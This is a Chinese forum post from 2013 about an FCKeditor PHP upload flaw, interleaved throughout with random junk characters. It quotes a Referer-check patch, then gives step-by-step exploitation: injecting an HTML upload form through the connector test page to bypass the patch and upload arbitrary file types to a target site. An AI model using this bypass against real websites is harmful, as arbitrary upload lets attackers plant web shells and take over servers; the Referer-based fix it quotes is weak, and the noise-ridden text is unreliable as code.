漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php+ X$ T) p, _1 G/ u3 @3 c. Z8 `
网上给出的修复方案是
: Z* Y) o% J2 x4 u修复方法,删除FCK编辑器用其他的编辑器
) ~& y H8 T0 n) R/ T或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件5 `9 N F8 a7 G( O7 P
在
: U$ r3 A& a: ^2 p) drequire(‘config.php’);) b# Z4 o6 s- N0 a
require(‘util.php’);
. T7 a% Y% Q D, T/ B% L% d9 \的下面添加以下代码—————————–9 _7 T/ |8 o$ V. X
//防止外部提交0 @4 F. `7 K" B/ l/ r6 p% y
function outsidepost()0 e2 v: q6 S& x- r* H1 R, h. D5 a
{& S9 T n* {0 \0 p& C
$servername=$_SERVER['SERVER_NAME'];
. p/ E: J, a0 ]9 H8 x) f- r$sub_from=@$_SERVER['HTTP_REFERER'];: u" B- K. Z/ i8 d% X, t
$sub_len=strlen($servername);, ^% b. H/ ]- |: N
$checkfrom=substr($sub_from,7,$sub_len);
) @+ t# g; p X- `9 fif($checkfrom!=$servername){
2 `8 D8 b$ c a! q s/ ]9 yecho(“you don’t outsidepost!”);
" V3 o. x) x5 \4 k! Nexit;, {- W2 k" z3 w- Z, C' f# a) r
}" S. w7 J6 d" q+ ?2 ?/ s, E
}
) y( v0 b8 i2 e5 t$ c3 Goutsidepost();; X `- I. K* E5 N$ ~
防止外部提交,但是没有防止内部提交,
( n! ?; d5 Q4 D* l" }利用方法:% v% A- g7 H! v1 \ I
1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
' C" z) B" W# B0 G2,在Current Folder 框输入
8 }7 u! U" g: @9 s3 _+ L<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
) Z* C: M b# K然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。; v' C0 c. m: u
PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |
发表于 2013-1-11 21:12:44
收藏
支持
反对